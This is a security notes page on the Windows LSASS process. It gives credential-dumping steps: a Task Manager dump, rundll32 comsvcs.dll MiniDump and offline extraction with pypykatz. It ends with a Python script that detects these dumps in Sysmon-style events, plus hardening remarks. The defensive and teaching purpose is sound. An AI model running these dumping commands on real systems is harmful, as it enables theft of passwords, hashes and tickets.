LSASS

LSASS (Local Security Authority Subsystem Service)

What LSASS Stores

  • NTLM Hashes

  • Kerberos tickets

  • WDigest clear-text creds

  • DPAPI masterkeys

  • SHA1 hashes

🧩 Dumping LSASS Memory

🖥️ 1. GUI Method (Task Manager)

Path:

Task Manager → Processes → Local Security Authority Process → Right-click → Create dump file

Output saved at:

%temp%\lsass.DMP

🖥️ 2. Command-line Method (rundll32 + comsvcs.dll)

⚠️ Most AV products block this, but it is the core technique:

🔎 Find LSASS PID

CMD:

tasklist /svc

PS:

Get-Process lsass

🧱 Create dump file

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

🧪 3. Extract Credentials (Offline)

pypykatz lsa minidump /path/to/lsass.dmp
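Both dump methods above leave the same telemetry: a process opening lsass.exe with read access, a rundll32 command line naming comsvcs.dll and MiniDump, and a .dmp file written to disk. The following is an added detection example, not part of the original notes or any vendor tool; it runs simple checks over constructed, Sysmon-style event dicts (the field names mirror Sysmon Event IDs 1, 10 and 11, and the sample events, PIDs and paths are made up). On hosts where LSASS runs as a protected process (RunAsPPL) or Credential Guard is enabled, these dumps fail or yield no usable secrets, so the detection is a complement to that hardening, not a substitute.

```python
"""Added example: flag LSASS-dump indicators in Sysmon-style events.

Three signals are checked, matching the steps described above:
  - Event ID 1  (process create): rundll32 + comsvcs.dll MiniDump command line
  - Event ID 10 (process access): lsass.exe opened with PROCESS_VM_READ
  - Event ID 11 (file create):    a .dmp file named after lsass written to disk
All sample data below is constructed; it is not real telemetry.
"""

import re
from typing import Dict, List, Optional, Tuple

# MiniDumpWriteDump needs PROCESS_VM_READ on the target; dumping tools
# typically request 0x1010, 0x1410 or 0x1FFFFF, all of which include this bit.
PROCESS_VM_READ = 0x0010

# Matches "comsvcs.dll, MiniDump" with optional whitespace, case-insensitive.
COMSVCS_MINIDUMP = re.compile(r"comsvcs\.dll\s*,\s*MiniDump", re.IGNORECASE)

# Constructed sample events in a simplified Sysmon-like shape.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 624 C:\lsass.dmp full"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    # Benign: query-limited access only, no VM_READ bit -> not flagged.
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\lsass.DMP"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes.txt"},
]


def check_event(event: Dict[str, object]) -> Optional[str]:
    """Return a human-readable reason if the event is an LSASS-dump indicator."""
    eid = event.get("EventID")
    if eid == 1:
        cmd = str(event.get("CommandLine", ""))
        if COMSVCS_MINIDUMP.search(cmd):
            return "rundll32/comsvcs.dll MiniDump command line"
    elif eid == 10:
        target = str(event.get("TargetImage", "")).lower()
        if target.endswith("\\lsass.exe"):
            access = int(str(event.get("GrantedAccess", "0x0")), 16)
            if access & PROCESS_VM_READ:
                src = event.get("SourceImage", "<unknown>")
                return f"lsass.exe opened with read access (0x{access:x}) by {src}"
    elif eid == 11:
        path = str(event.get("TargetFilename", "")).lower()
        filename = path.rsplit("\\", 1)[-1]
        if filename.endswith(".dmp") and "lsass" in filename:
            return f"dump file named after lsass written: {path}"
    return None


def scan(events: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Run check_event over a list of events; return (EventID, reason) hits."""
    hits: List[Tuple[int, str]] = []
    for ev in events:
        reason = check_event(ev)
        if reason is not None:
            hits.append((int(str(ev["EventID"])), reason))
    return hits


if __name__ == "__main__":
    for eid, reason in scan(SAMPLE_EVENTS):
        print(f"[EID {eid}] {reason}")
```

The GrantedAccess test keys on the single PROCESS_VM_READ bit rather than on a fixed mask, so it catches any access value a dumper might request; in a real deployment you would add an allow-list of source images that legitimately read LSASS (EDR and AV agents) to keep the alert volume manageable.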
